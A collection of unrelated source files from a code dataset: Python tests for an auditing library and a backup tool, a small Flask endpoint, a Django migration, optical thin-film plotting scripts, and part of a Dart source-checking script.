class EventsTestCase(SeagrassTestCaseMixin, unittest.TestCase):
    """Tests for events created by Seagrass."""

    def test_wrap_class_property(self):
        """Property accessors wrapped as audited events trigger their hooks."""
        # Override a class property to call a hook whenever it's accessed
        class Foo:
            def __init__(self):
                self.x = 0

            def add_one(self):
                return self.x + 1

        hook = CounterHook()

        @self.auditor.audit("test.foo.get_x", hooks=[hook])
        def get_x(self):
            return self.__x

        @self.auditor.audit("test.foo.set_x", hooks=[hook])
        def set_x(self, val):
            self.__x = val

        @self.auditor.audit("test.foo.del_x", hooks=[hook])
        def del_x(self):
            del self.__x

        setattr(Foo, "x", property(fget=get_x, fset=set_x, fdel=del_x))

        with self.auditor.start_auditing():
            f = Foo()
            f.x = 1
            y = f.x  # noqa: F841
            f.x += 2
            del f.x

        # We call get_x twice (once for y = f.x, another for f.x += 2)
        # We call set_x three times (once during Foo.__init__, once during f.x = 1, and
        # once during f.x += 2)
        # We call del_x once (when we call del f.x)
        self.assertEqual(hook.event_counter["test.foo.get_x"], 2)
        self.assertEqual(hook.event_counter["test.foo.set_x"], 3)
        self.assertEqual(hook.event_counter["test.foo.del_x"], 1)

        # Now override the add_one function belonging to Foo
        current_add_one = Foo.add_one

        @self.auditor.audit("test.foo.add_one", hooks=[hook])
        def add_one(self, *args, **kwargs):
            return current_add_one(self, *args, **kwargs)

        setattr(Foo, "add_one", add_one)

        with self.auditor.start_auditing():
            f = Foo()
            result = f.add_one()

        self.assertEqual(result, 1)
        self.assertEqual(hook.event_counter["test.foo.add_one"], 1)

    def test_toggle_event(self):
        """Disabling an event suspends its hooks; re-enabling restores them."""
        hook = CounterHook()

        @self.auditor.audit("test.foo", hooks=[hook])
        def foo():
            return

        @self.auditor.audit("test.bar", hooks=[hook])
        def bar():
            return foo()

        with self.auditor.start_auditing():
            bar()
            self.assertEqual(hook.event_counter["test.foo"], 1)
            self.assertEqual(hook.event_counter["test.bar"], 1)

            # After disabling an event, its event hooks should no longer be called
            self.auditor.toggle_event("test.foo", False)
            bar()
            self.assertEqual(hook.event_counter["test.foo"], 1)
            self.assertEqual(hook.event_counter["test.bar"], 2)

            # Now we re-enable the event so that hooks get called again
            self.auditor.toggle_event("test.foo", True)
            bar()
            self.assertEqual(hook.event_counter["test.foo"], 2)
            self.assertEqual(hook.event_counter["test.bar"], 3)

    @req_python_version(min=(3, 8))
    def test_wrap_function_and_create_sys_audit_event(self):
        """Audited functions optionally raise sys.audit events around calls."""
        # We should be able to set up sys.audit events when we wrap functions
        @self.auditor.audit("test.foo", raise_runtime_events=True)
        def foo(x, y, z=None):
            return x + y + (0 if z is None else z)

        @self.auditor.audit("test.bar", raise_runtime_events=False)
        def bar(x, y, z=None):
            return x + y + (0 if z is None else z)

        @self.auditor.audit(
            "test.baz",
            raise_runtime_events=True,
            prehook_audit_event_name="baz_prehook",
            posthook_audit_event_name="baz_posthook",
        )
        def baz(x, y, z=None):
            return x + y + (0 if z is None else z)

        events_counter = Counter()
        args_dict = defaultdict(list)

        def audit_hook(event: str, *args):
            try:
                if event.startswith("prehook:") or event.startswith("posthook:"):
                    events_counter[event] += 1
                    args_dict[event].append(args)
                elif event in ("baz_prehook", "baz_posthook"):
                    events_counter[event] += 1
                    args_dict[event].append(args)
            except Exception as ex:
                warnings.warn(f"Exception raised in audit_hook: ex={ex}")

        # NOTE: per the sys docs, audit hooks cannot be removed once added;
        # this hook stays installed for the rest of the process.
        sys.addaudithook(audit_hook)

        test_args = [(-3, 4), (5, 8), (0, 0)]
        test_kwargs = [{}, {}, {"z": 1}]

        def run_fns(args_list, kwargs_list):
            for (args, kwargs) in zip(args_list, kwargs_list):
                for fn in (foo, bar, baz):
                    fn(*args, **kwargs)

        # The following call to run_fns shouldn't raise any audit events since
        # it isn't performed in an auditing context.
        run_fns(test_args, test_kwargs)
        self.assertEqual(set(events_counter), set())
        self.assertEqual(set(args_dict), set())

        # Now some audit events should be raised:
        with self.auditor.start_auditing():
            run_fns(test_args, test_kwargs)

        expected_prehooks = ["prehook:test.foo", "baz_prehook"]
        expected_posthooks = ["posthook:test.foo", "baz_posthook"]
        self.assertEqual(
            set(events_counter), set(expected_prehooks + expected_posthooks)
        )
        self.assertEqual(set(events_counter), set(args_dict))

        for event in expected_prehooks:
            self.assertEqual(events_counter[event], len(test_args))
            args = [args[0][0] for args in args_dict[event]]
            kwargs = [args[0][1] for args in args_dict[event]]
            self.assertEqual(args, test_args)
            self.assertEqual(kwargs, test_kwargs)

        # If we try running our functions outside of an auditing context again,
        # we should once again find that no system events are raised.
        events_counter.clear()
        args_dict.clear()
        run_fns(test_args, test_kwargs)
        self.assertEqual(set(events_counter), set())
        self.assertEqual(set(args_dict), set())

    @req_python_version(max=(3, 8))
    def test_get_error_with_runtime_events_for_python_before_38(self):
        """For Python versions before 3.8, sys.audit and sys.addaudithook do not exist, so
        an exception should be raised if raise_runtime_events=True."""
        with self.assertRaises(NotImplementedError):
            self.auditor.create_event("my_test_event", raise_runtime_events=True)

    def test_auto_name_event(self):
        """`auto` derives the event name from the wrapped function's qualified name."""
        from pathlib import Path

        auhome = self.auditor.audit(auto, Path.home)
        self.assertEqual(auhome.__event_name__, "pathlib.Path.home")

        # Check the name of the audited function from the ExampleClass class at
        # the top of the file.
        self.assertEqual(
            ExampleClass.say_hello.__event_name__, f"{__name__}.ExampleClass.say_hello"
        )

    def test_get_current_event(self):
        """get_current_event reflects the innermost active audited event."""
        @self.auditor.audit("test.foo")
        def foo():
            self.assertEqual(get_current_event(), "test.foo")

        @self.auditor.audit("test.bar")
        def bar():
            self.assertEqual(get_current_event(), "test.bar")
            foo()
            # After the nested call returns, the enclosing event is current again.
            self.assertEqual(get_current_event(), "test.bar")

        with self.auditor.start_auditing():
            foo()
            bar()

        # We should be able to specify a default value for get_current_event(). If no default is
        # specified and an event isn't being executed, an exception should be thrown.
        self.assertEqual(get_current_event(None), None)
        with self.assertRaises(LookupError):
            get_current_event()
if __name__ == "__main__":
    # Allow running this test module directly with the unittest runner.
    unittest.main()
| StarcoderdataPython |
1648324 | <reponame>drmorr0/backuppy
import inspect
import os
import re
import sys
import traceback
from contextlib import contextmanager
from hashlib import sha256
from shutil import rmtree
import mock
import pytest
from backuppy.config import setup_config
from backuppy.manifest import MANIFEST_FILE
from backuppy.manifest import MANIFEST_PREFIX
from backuppy.run import setup_logging
# Locations used by the integration tests; all paths are relative to the repo root.
ITEST_ROOT = 'itests'
ITEST_CONFIG = os.path.join(ITEST_ROOT, 'itest.conf')
DATA_DIRS = [os.path.join(ITEST_ROOT, 'data'), os.path.join(ITEST_ROOT, 'data2')]
BACKUP_DIR = os.path.join(ITEST_ROOT, 'backup', 'data1_backup')
RESTORE_DIR = os.path.join(ITEST_ROOT, 'restore')
ITEST_MANIFEST_PATH = os.path.join(BACKUP_DIR, MANIFEST_FILE)
ITEST_SCRATCH = os.path.join(ITEST_ROOT, 'scratch')
def compute_sha(string):
    """Return the hex-encoded SHA-256 digest of *string* (a bytes object)."""
    digest = sha256(string)
    return digest.hexdigest()
def get_latest_manifest():
    """Return the path of the most recent manifest file in the backup directory.

    Manifest filenames sort lexicographically, so the last entry in sorted
    order is the newest one.
    """
    manifest_paths = [
        os.path.join(BACKUP_DIR, entry)
        for entry in os.listdir(BACKUP_DIR)
        if entry.startswith(MANIFEST_PREFIX)
    ]
    manifest_paths.sort()
    return manifest_paths[-1]
@pytest.fixture(autouse=True, scope='session')
def initialize_session():
    """Load the itest configuration and logging once per pytest session."""
    setup_config(ITEST_CONFIG)
    setup_logging('debug')
@pytest.fixture(autouse=True, scope='module')
def initialize_module():
    """Reset the data/backup/scratch directories before each itest module."""
    # Install a no-op trace function; presumably this primes sys tracing so
    # make_trace_func-based side effects can attach later -- verify.
    sys.settrace(lambda a, b, c: None)
    for d in DATA_DIRS + [BACKUP_DIR, ITEST_SCRATCH]:
        try:
            rmtree(d)
        except FileNotFoundError:
            # Directory was never created by a previous run; nothing to clean.
            pass
    [os.makedirs(d) for d in DATA_DIRS]
    os.makedirs(BACKUP_DIR)
    os.makedirs(ITEST_SCRATCH)
class ItestException(Exception):
    """Base exception type for integration-test failures."""
    pass
class _TestFileData:
    """Describes one file used in an itest: its path, contents, and mode.

    A falsy *contents* value means "this file should be deleted" when
    ``write`` is called.
    """
    def __init__(self, filename, contents, data_dir_index=0, mode=0o100644):
        self.path = os.path.join(DATA_DIRS[data_dir_index], filename)
        if contents:
            self.contents = contents.encode()
            self.sha = compute_sha(self.contents)
            self.mode = mode
        else:
            # Sentinel state: the file is expected to be removed.
            self.contents = None
            self.sha = None
            self.mode = None

    def write(self):
        """Create/overwrite the file on disk, or delete it if contents is None."""
        if self.contents:
            os.makedirs(os.path.dirname(self.path), exist_ok=True)
            with open(self.path, 'wb') as f:
                f.write(self.contents)
            os.chmod(self.path, self.mode)
        else:
            os.remove(self.path)

    @property
    def backup_path(self):
        """Path of the backed-up blob (sharded by SHA prefix), or None if deleted."""
        if self.sha:
            return os.path.join(BACKUP_DIR, self.sha[:2], self.sha[2:4], self.sha[4:])
        else:
            return None

    def __eq__(self, other):
        # NOTE(review): returns *other* (e.g. None) instead of False when
        # other is falsy; callers use the result in boolean context so this
        # works, but a strict bool would be cleaner -- confirm before changing.
        return other and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
def make_trace_func(search_string, side_effect):
    """Build a sys.settrace function that fires *side_effect* when a traced
    line in a backuppy module carries a comment matching ``# <search_string>``.

    Used by the itests to inject a failure at a marked line inside backuppy
    code without modifying that code.
    """
    def trace_func(frame, event, arg):
        if event == 'call':
            try:
                module = inspect.getmodule(frame)
            except (TypeError, AttributeError):
                # Frame has no resolvable module; don't trace into it.
                return None
            if module and not module.__name__.startswith('backuppy'):
                # Outside backuppy: disable per-line tracing for this frame
                # (f_trace_lines exists on CPython 3.7+).
                if not hasattr(frame, 'f_trace_lines'):
                    return None
                frame.f_trace_lines = False
                return trace_func
        elif event == 'line':
            line = traceback.extract_stack(frame, limit=1)[0].line
            m = re.search(f'#\s+{search_string}', line)
            if m:
                # Note that if side_effect() raises an Exception, the trace function will
                # no longer function, because this must return a reference to trace_func and
                # raising doesn't return; the practical effect of this is that each individual
                # itest can only inject one "crash" into the application. I think this is
                # generally OK, since itests "shouldn't" be testing multiple things at once
                side_effect()
        return trace_func
    return trace_func
@contextmanager
def itest_setup(
    test_file_history,
    *dec_args,
):
    """Write the given _TestFileData fixtures, record them in
    *test_file_history*, and patch backuppy so that scratch paths, directory
    shuffling, and confirmation prompts are deterministic during the test.
    """
    for tfd in dec_args:
        # Record/write a fixture only when it changes the file's latest state.
        if tfd.path in test_file_history and tfd != test_file_history[tfd.path][-1]:
            test_file_history[tfd.path].append(tfd)
            tfd.write()
        elif tfd.path not in test_file_history:
            test_file_history[tfd.path] = [tfd]
            tfd.write()
    with mock.patch('backuppy.stores.backup_store.get_scratch_dir') as mock_scratch_1, \
            mock.patch('backuppy.manifest.get_scratch_dir') as mock_scratch_2, \
            mock.patch('backuppy.util.shuffle') as mock_shuffle, \
            mock.patch('backuppy.cli.restore.ask_for_confirmation', return_value=True):
        # make sure tests are repeatable, no directory-shuffling
        mock_shuffle.side_effect = lambda l: l.sort()
        mock_scratch_1.return_value = ITEST_SCRATCH
        mock_scratch_2.return_value = ITEST_SCRATCH
        yield
| StarcoderdataPython |
3252396 | import os
from flask import Flask
from flask import jsonify
app = Flask(__name__)
@app.route('/')
def hello():
    """Root endpoint: return basic API metadata as JSON."""
    payload = {
        'message': 'API Bookmark',
        'version': '1.0.0',
        'code': 200,
    }
    return jsonify(payload)
if __name__ == '__main__':
    # Run Flask's built-in development server when executed directly.
    app.run()
4929435 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-10 09:13
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
def set_inaugural_grant_expiration(apps, schema_editor):  # pylint: disable=unused-argument
    """Backfill inauguration_grant_expiration for all existing claimants.

    The expiration date is 31 March, two years after the application year.
    """
    claimant_model = apps.get_model("lowfat", "Claimant")
    for claimant in claimant_model.objects.all():
        expiry = datetime.date(
            claimant.application_year + 2,
            3,
            31,
        )
        claimant.inauguration_grant_expiration = expiry
        claimant.save()
class Migration(migrations.Migration):
    """Add inauguration_grant_expiration and backfill it for existing claimants."""
    dependencies = [
        ('lowfat', '0101_auto_20170426_1007'),
    ]
    operations = [
        # 1. Add the column with a static default so existing rows are valid.
        migrations.AddField(
            model_name='claimant',
            name='inauguration_grant_expiration',
            field=models.DateField(default=datetime.date(2019, 3, 31)),
        ),
        # 2. Backfill per-claimant values derived from the application year.
        # NOTE(review): no reverse_code is given, so this migration is
        # irreversible -- confirm that is intended.
        migrations.RunPython(set_inaugural_grant_expiration),
        # 3. Mirror the field on the historical (audit) table.
        migrations.AddField(
            model_name='historicalclaimant',
            name='inauguration_grant_expiration',
            field=models.DateField(default=datetime.date(2019, 3, 31)),
        ),
    ]
| StarcoderdataPython |
11323987 | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
from .parametric_dqn import ParametricDQN
__all__ = ["ParametricDQN"]
| StarcoderdataPython |
6489146 | <reponame>rnsheehan/Matrix_Methods
# Import libraries
# You should try an import the bare minimum of modules
import sys # access system routines
import os
import glob
import re
import math
import scipy
import numpy as np
import matplotlib.pyplot as plt
# add path to our file
sys.path.append('c:/Users/Robert/Programming/Python/Common/')
sys.path.append('c:/Users/Robert/Programming/Python/Plotting/')
import Common
import Plotting
MOD_NAME_STR = "Plots" # use this in exception handling messages
def iface_r_t():
    """Plot the computed single-interface reflection / transmission curves.

    Loads the r / t coefficients for TE and TM polarisation versus input
    angle from a comma-delimited data file and renders all four curves on a
    single figure via the Plotting helper module.
    """
    FUNC_NAME = ".iface_r_t()"  # use this in exception handling messages
    ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME

    try:
        filename = "Air_to_Glass_R_T.txt"
        # filename = "Glass_to_Air_R_T.txt"
        if glob.glob(filename):
            # dataset columns: 0 = input angle, 1 = r_TE, 2 = t_TE, 3 = r_TM, 4 = t_TM
            data = np.loadtxt(filename, delimiter=',', skiprows=4, unpack=True)

            # One (curve, legend label, line marker) entry per plotted quantity.
            curve_specs = [
                (data[1], '$r_{TE}$', Plotting.labs_lins[0]),
                (data[3], '$r_{TM}$', Plotting.labs_dashed[0]),
                (data[2], '$t_{TE}$', Plotting.labs_lins[1]),
                (data[4], '$t_{TM}$', Plotting.labs_dashed[1]),
            ]
            hv_data = [[data[0], curve] for curve, _, _ in curve_specs]
            labels = [label for _, label, _ in curve_specs]
            marks = [mark for _, _, mark in curve_specs]

            # make the plot of the data set
            args = Plotting.plot_arg_multiple()
            args.loud = True
            args.crv_lab_list = labels
            args.mrk_list = marks
            args.x_label = 'Input Angle (rad)'
            args.y_label = 'Reflection / Transmission'
            args.fig_name = filename.replace('.txt', '')
            Plotting.plot_multiple_curves(hv_data, args)
        else:
            # Report *which* file is missing instead of a silent bare Exception.
            raise EnvironmentError("could not locate input file: " + filename)
    except Exception as e:
        print(ERR_STATEMENT)
        print(e)
def layer_r_t():
    """Plot the dielectric-layer reflectivity / transmissivity curves.

    Loads R / T data for TE and TM polarisation versus layer thickness and
    plots them against thickness normalised to the 1550 nm wavelength.
    """
    FUNC_NAME = ".layer_r_t()"  # use this in exception handling messages
    ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME

    try:
        # filename = "Air_Silicon_Silica_R_T.txt"
        # filename = "Air_Silicon_Silica_R_T_Alt.txt"
        # filename = "Air_Silica_Silicon_R_T.txt"
        filename = "Air_Silica_Silicon_R_T_Alt.txt"
        if glob.glob(filename):
            # dataset columns: 0 = thickness (nm), 1 = R_TE, 2 = T_TE, 3 = R_TM, 4 = T_TM
            data = np.loadtxt(filename, delimiter=',', unpack=True)

            # Normalise layer thickness to the 1550 nm operating wavelength.
            lscale = (1.0 / 1550.0)
            thickness = data[0] * lscale

            # One (curve, legend label, line marker) entry per plotted quantity.
            curve_specs = [
                (data[1], '$R_{TE}$', Plotting.labs_lins[0]),
                (data[3], '$R_{TM}$', Plotting.labs_dashed[0]),
                (data[2], '$T_{TE}$', Plotting.labs_lins[1]),
                (data[4], '$T_{TM}$', Plotting.labs_dashed[1]),
            ]
            hv_data = [[thickness, curve] for curve, _, _ in curve_specs]
            labels = [label for _, label, _ in curve_specs]
            marks = [mark for _, _, mark in curve_specs]

            # make the plot of the data set
            args = Plotting.plot_arg_multiple()
            args.loud = True
            args.crv_lab_list = labels
            args.mrk_list = marks
            args.x_label = 'Layer Thickness / Wavelength'
            args.y_label = 'Reflectivity / Transmissivity'
            args.plt_range = [thickness[0], thickness[-1], 0.0, 1.0]
            args.fig_name = filename.replace('.txt', '')
            Plotting.plot_multiple_curves(hv_data, args)
        else:
            # Report *which* file is missing instead of a silent bare Exception.
            raise EnvironmentError("could not locate input file: " + filename)
    except Exception as e:
        print(ERR_STATEMENT)
        print(e)
def layer_r_t_alt_compare():
    """Compare R/T curves from two computations of the same layer stack.

    Overlays R_TE and T_TE from the standard and the "Alt" result files on
    one plot so the two methods can be compared directly.  Prints an error
    message if either data file cannot be found or the plot fails.
    """
    # R. Sheehan 17 - 6 - 2020

    # fixed: FUNC_NAME previously said ".layer_r_t()" (copy-paste error)
    FUNC_NAME = ".layer_r_t_alt_compare()"  # use this in exception handling messages
    ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME

    try:
        #filename = "Air_Silicon_Silica_R_T.txt"
        #filename = "Air_Silicon_Silica_R_T_Alt.txt"
        filename1 = "Air_Silica_Silicon_R_T.txt"
        filename2 = "Air_Silica_Silicon_R_T_Alt.txt"

        if glob.glob(filename1) and glob.glob(filename2):
            # import both datasets; columns: thickness, R_TE, T_TE, ...
            data1 = np.loadtxt(filename1, delimiter=',', unpack=True)
            data2 = np.loadtxt(filename2, delimiter=',', unpack=True)

            lscale = (1.0 / 1550.0)  # thickness is normalised to the 1550 nm wavelength

            hv_data = []; labels = []; marks = []
            hv_data.append([data1[0]*lscale, data1[1]]); labels.append('$R_{TE}$'); marks.append(Plotting.labs_lins[0])
            hv_data.append([data1[0]*lscale, data1[2]]); labels.append('$T_{TE}$'); marks.append(Plotting.labs_lins[1])
            hv_data.append([data2[0]*lscale, data2[1]]); labels.append('$R_{TE}^{alt}$'); marks.append(Plotting.labs_dashed[0])
            hv_data.append([data2[0]*lscale, data2[2]]); labels.append('$T_{TE}^{alt}$'); marks.append(Plotting.labs_dashed[1])

            # make the plot of the data set
            args = Plotting.plot_arg_multiple()
            args.loud = True
            args.crv_lab_list = labels
            args.mrk_list = marks
            args.x_label = 'Layer Thickness / Wavelength'
            args.y_label = 'Reflectivity / Transmissivity'
            args.plt_range = [data1[0][0]*lscale, data1[0][-1]*lscale, 0.0, 1.0]
            args.fig_name = filename1.replace('.txt', '') + '_Compar'

            Plotting.plot_multiple_curves(hv_data, args)
        else:
            # raise with a message so the handler below prints something useful
            raise Exception('Cannot find input files: ' + filename1 + ', ' + filename2)
    except Exception as e:
        print(ERR_STATEMENT)
        print(e)
def layer_AR():
    """Plot anti-reflection-coating reflectivity versus wavelength.

    Reads reflectivity curves for several multiples of the quarter-wave
    coating thickness from a comma-separated text file and plots a chosen
    subset of them.  Prints an error message if the data file cannot be
    found or the plot fails.
    """
    # R. Sheehan 17 - 6 - 2020

    FUNC_NAME = ".layer_AR()"  # use this in exception handling messages
    ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME

    try:
        filename = "Air_MgF2_Glass.txt"
        #filename = "Air_SiO2_SiN.txt"

        if glob.glob(filename):
            # import the dataset; column 0 is wavelength, the rest are
            # reflectivities at increasing coating-thickness multiples
            data = np.loadtxt(filename, delimiter=',', unpack=True)

            hv_data = []; labels = []; marks = []
            #hv_data.append([data[0], data[1]]); labels.append('T = 267.24 nm'); marks.append(Plotting.labs_lins[0])
            hv_data.append([data[0], data[1]]); labels.append('T = 101.86 nm'); marks.append(Plotting.labs_lins[0])
            hv_data.append([data[0], data[3]]); labels.append('2 T'); marks.append(Plotting.labs_lins[1])
            #hv_data.append([data[0], data[2]]); labels.append('3 T'); marks.append(Plotting.labs_lins[2])
            #hv_data.append([data[0], data[4]]); labels.append('4 T'); marks.append(Plotting.labs_lins[3])
            hv_data.append([data[0], data[5]]); labels.append('5 T'); marks.append(Plotting.labs_lins[4])

            # make the plot of the data set
            args = Plotting.plot_arg_multiple()
            args.loud = True
            args.crv_lab_list = labels
            args.mrk_list = marks
            args.x_label = 'Wavelength nm'
            args.y_label = 'Reflectivity'
            args.plt_range = [data[0][0], data[0][-1], 0.0, 0.05]
            args.fig_name = filename.replace('.txt', '')

            Plotting.plot_multiple_curves(hv_data, args)
        else:
            # raise with a message so the handler below prints something useful
            raise Exception('Cannot find input file: ' + filename)
    except Exception as e:
        print(ERR_STATEMENT)
        print(e)
def layer_HR():
    """Plot high-reflectivity-coating R and T versus wavelength.

    Reads the reflectivity and transmissivity curves of a 15-layer HR
    coating from a comma-separated text file and plots both.  Prints an
    error message if the data file cannot be found or the plot fails.
    """
    # R. Sheehan 17 - 6 - 2020

    FUNC_NAME = ".layer_HR()"  # use this in exception handling messages
    ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME

    try:
        filename = "HR_Coating_15.txt"

        if glob.glob(filename):
            # import the dataset; columns: wavelength, R, T
            data = np.loadtxt(filename, delimiter=',', unpack=True)

            hv_data = []; labels = []; marks = []
            hv_data.append([data[0], data[1]]); labels.append('R'); marks.append(Plotting.labs_lins[0])
            hv_data.append([data[0], data[2]]); labels.append('T'); marks.append(Plotting.labs_lins[1])

            # make the plot of the data set
            args = Plotting.plot_arg_multiple()
            args.loud = True
            args.crv_lab_list = labels
            args.mrk_list = marks
            args.x_label = 'Wavelength nm'
            args.y_label = 'Reflectivity / Transmissivity'
            args.plt_range = [data[0][0], data[0][-1], 0.0, 1.0]
            args.fig_name = filename.replace('.txt', '')

            Plotting.plot_multiple_curves(hv_data, args)
        else:
            # raise with a message so the handler below prints something useful
            raise Exception('Cannot find input file: ' + filename)
    except Exception as e:
        print(ERR_STATEMENT)
        print(e)
def layer_HR_2():
    """Plot HR-coating reflectivity curves for several layer counts.

    Loads the reflectivity curve from each available HR_Coating_*.txt file
    (7, 11 and 15 layers) and overlays them on one plot.  Prints an error
    message if none of the files can be found or the plot fails.
    """
    # R. Sheehan 19 - 6 - 2020

    FUNC_NAME = ".layer_HR_2()"  # use this in exception handling messages
    ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME

    try:
        hv_data = []; labels = []; marks = []
        files = ["HR_Coating_7.txt", "HR_Coating_11.txt", "HR_Coating_15.txt"]
        count = 7  # number of layers in the first file
        i = 0
        data = None
        for f in files:
            if glob.glob(f):
                # columns: wavelength, R, ...
                data = np.loadtxt(f, delimiter=',', unpack=True)
                hv_data.append([data[0], data[1]]); labels.append('Layers = %(v1)d'%{"v1":count}); marks.append(Plotting.labs_lins[i])
                count = count + 4
                i = i + 1

        # fixed: previously 'data' was referenced unconditionally below,
        # raising a NameError when no input file matched
        if not hv_data:
            raise Exception('Cannot find any of the input files: ' + ', '.join(files))

        # make the plot of the data set
        args = Plotting.plot_arg_multiple()
        args.loud = True
        args.crv_lab_list = labels
        args.mrk_list = marks
        args.x_label = 'Wavelength nm'
        args.y_label = 'Reflectivity'
        # x-range taken from the last file that was loaded
        args.plt_range = [data[0][0], data[0][-1], 0.0, 1.0]
        args.fig_name = 'HR_Coating'

        Plotting.plot_multiple_curves(hv_data, args)
    except Exception as e:
        print(ERR_STATEMENT)
        print(e)
def layer_BP():
    """Plot band-pass-filter R and T versus wavelength.

    Reads the reflectivity and transmissivity curves of the 3-pair BP
    filter from a comma-separated text file and plots both.  Prints an
    error message if the data file cannot be found or the plot fails.
    """
    # R. Sheehan 22 - 6 - 2020

    FUNC_NAME = ".layer_BP()"  # use this in exception handling messages
    ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME

    try:
        filename = "BP_Filter_3.txt"

        if glob.glob(filename):
            # import the dataset; columns: wavelength, R, T
            data = np.loadtxt(filename, delimiter=',', unpack=True)

            hv_data = []; labels = []; marks = []
            hv_data.append([data[0], data[1]]); labels.append('R'); marks.append(Plotting.labs_lins[0])
            hv_data.append([data[0], data[2]]); labels.append('T'); marks.append(Plotting.labs_lins[1])

            # make the plot of the data set
            args = Plotting.plot_arg_multiple()
            args.loud = True
            args.crv_lab_list = labels
            args.mrk_list = marks
            args.x_label = 'Wavelength nm'
            args.y_label = 'Reflectivity / Transmissivity'
            args.plt_range = [data[0][0], data[0][-1], 0.0, 1.0]
            args.fig_name = filename.replace('.txt', '')

            Plotting.plot_multiple_curves(hv_data, args)
        else:
            # raise with a message so the handler below prints something useful
            raise Exception('Cannot find input file: ' + filename)
    except Exception as e:
        print(ERR_STATEMENT)
        print(e)
def layer_BP_2():
    """Plot band-pass-filter transmissivity for several pair counts.

    Loads the transmission curve from each available BP_Filter_*.txt file
    (1 to 4 pairs) and overlays them on one plot.  Prints an error message
    if none of the files can be found or the plot fails.
    """
    # R. Sheehan 19 - 6 - 2020

    FUNC_NAME = ".layer_BP_2()"  # use this in exception handling messages
    ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME

    try:
        hv_data = []; labels = []; marks = []
        files = ["BP_Filter_1.txt", "BP_Filter_2.txt", "BP_Filter_3.txt", "BP_Filter_4.txt"]
        count = 1  # pair count of the first file
        i = 0
        data = None
        for f in files:
            if glob.glob(f):
                # columns: wavelength, R, T
                data = np.loadtxt(f, delimiter=',', unpack=True)
                hv_data.append([data[0], data[2]]); labels.append('Layers = %(v1)d'%{"v1":count}); marks.append(Plotting.labs_lins[i])
                count = count + 1
                i = i + 1

        # fixed: previously 'data' was referenced unconditionally below,
        # raising a NameError when no input file matched
        if not hv_data:
            raise Exception('Cannot find any of the input files: ' + ', '.join(files))

        # make the plot of the data set
        args = Plotting.plot_arg_multiple()
        args.loud = True
        args.crv_lab_list = labels
        args.mrk_list = marks
        args.x_label = 'Wavelength nm'
        args.y_label = 'Transmissivity'
        # x-range taken from the last file that was loaded
        args.plt_range = [data[0][0], data[0][-1], 0.0, 1.0]
        args.fig_name = 'BP_Filter'

        Plotting.plot_multiple_curves(hv_data, args)
    except Exception as e:
        print(ERR_STATEMENT)
        print(e)
def layer_BP_BW():
    """Plot the band-pass-filter transmission bandwidth versus pair count.

    The bandwidth values were measured from the BP-filter transmission
    curves and are hard-coded here; the curve is drawn with the project
    Plotting module.  Prints an error message if the plot fails.
    """
    # R. Sheehan 22 - 6 - 2020

    FUNC_NAME = ".layer_BP_BW()"  # use this in exception handling messages
    ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME

    try:
        # number of layer pairs and the corresponding transmission bandwidth (nm)
        pair_counts = [1, 2, 3, 4, 5]
        bandwidths = [151.70, 22.48, 3.86, 0.67, 0.12]

        # configure and draw the single-curve plot
        plot_args = Plotting.plot_arg_single()
        plot_args.loud = True
        plot_args.marker = Plotting.labs_mrk_only[3]
        plot_args.x_label = 'No. Layer Pairs'
        plot_args.y_label = 'Transmission BW (nm)'
        plot_args.fig_name = 'BP_Filter_BW'

        Plotting.plot_single_curve(pair_counts, bandwidths, plot_args)
    except Exception as e:
        print(ERR_STATEMENT)
        print(e)
def main():
    # No batch driver is defined; individual plot functions are
    # commented in/out in the __main__ block below instead.
    pass

if __name__ == '__main__':
    main()

    pwd = os.getcwd()  # current working directory; data files are read relative to it
    #print(pwd)

    # Uncomment the plot(s) to be generated for this run.
    #iface_r_t()

    #layer_r_t()

    layer_r_t_alt_compare()

    #layer_AR()

    #layer_HR_2()

    #layer_BP()

    #layer_BP_2()

    #layer_BP_BW()
| StarcoderdataPython |
3285575 | #!/usr/bin/env python3.8
# Copyright 2019 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import os
import sys
import pathlib
def main():
    """Verify that the declared 'sources' list matches the .dart files on disk.

    Walks --source_dir collecting every .dart file (relative paths), and
    compares that set against the source paths passed on the command line.
    On an exact match the --stamp file is written and 0 is returned;
    otherwise the missing / nonexistent entries are printed and 1 is
    returned.
    """
    # NOTE(review): the string below is passed positionally, so argparse
    # uses it as the program name (prog), not as a description.
    parser = argparse.ArgumentParser(
        "Verifies that all .dart files are included in sources, and sources don't include nonexistent files"
    )
    parser.add_argument(
        "--source_dir",
        help="Path to the directory containing the package sources",
        required=True)
    parser.add_argument(
        "--stamp",
        help="File to touch when source checking succeeds",
        required=True)
    parser.add_argument(
        "sources", help="source files", nargs=argparse.REMAINDER)
    args = parser.parse_args()

    actual_sources = set()
    # Get all dart sources from source directory, keyed by their
    # normalized path relative to the source root.
    src_dir_path = pathlib.Path(args.source_dir)
    for (dirpath, dirnames, filenames) in os.walk(src_dir_path, topdown=True):
        relpath_to_src_root = pathlib.Path(dirpath).relative_to(src_dir_path)
        actual_sources.update(
            os.path.normpath(relpath_to_src_root.joinpath(filename))
            for filename in filenames
            if pathlib.Path(filename).suffix == ".dart")

    expected_sources = set(args.sources)
    # It is possible for sources to include dart files outside of source_dir;
    # accept any declared source that actually exists on disk.
    actual_sources.update(
        [
            s for s in (expected_sources - actual_sources)
            if src_dir_path.joinpath(s).resolve().exists()
        ],
    )

    if actual_sources == expected_sources:
        with open(args.stamp, "w") as stamp:
            stamp.write("Success!")
        return 0

    def sources_to_abs_path(sources):
        # Expand relative source paths for readable error output.
        return sorted(str(src_dir_path.joinpath(s)) for s in sources)

    missing_sources = actual_sources - expected_sources
    if missing_sources:
        print(
            '\nSource files found that were missing from the "sources" parameter:\n{}\n'
